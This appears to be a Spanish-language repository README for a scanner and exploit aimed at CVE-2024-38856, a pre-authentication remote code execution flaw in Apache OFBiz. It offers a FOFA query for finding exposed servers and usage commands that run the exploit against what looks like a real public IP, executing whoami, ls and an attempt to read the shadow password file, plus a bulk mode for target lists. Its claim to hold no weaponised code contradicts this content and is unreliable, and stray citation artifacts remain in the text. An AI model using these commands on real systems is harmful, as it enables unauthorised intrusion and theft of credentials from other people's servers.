
CVE-2024-38856: Escáner y Exploit de ejecución remota de código de Apache OFBiz
Propósito del repositorio: documentación informativa sobre CVE-2024-38856 (autorización incorrecta / RCE pre-autenticación en Apache OFBiz).
Este repositorio no contiene código de exploit armado. Está destinado únicamente a investigación defensiva, orientación sobre parches, detección y pruebas seguras en laboratorio.
CVE-2024-38856 es una vulnerabilidad de autorización incorrecta en Apache OFBiz que puede permitir el acceso no autenticado a ciertos endpoints y, bajo condiciones específicas, habilitar la ejecución de código de renderizado de pantalla que puede llevar a la ejecución remota de código en los sistemas afectados. El problema se corrigió en Apache OFBiz 18.12.15; las versiones anteriores hasta 18.12.14 están afectadas. :contentReference[oaicite:0]{index=0}
Gravedad/Impacto: múltiples proveedores de seguridad e investigadores calificaron esta vulnerabilidad como crítica — puede llevar a la ejecución remota de código no autenticada en instancias vulnerables, y se ha observado en intentos de explotación activa en la naturaleza. Los administradores deben tratar las instancias expuestas de OFBiz como elementos de remediación de alta prioridad. :contentReference[oaicite:1]{index=1}
fofa : app="Apache_OFBiz" && port="8443"
git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.gitcd CVE-2024-38856-Apache-OFBiz└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"
─$ python3 apache_bang.py --file target.txt -c "ls"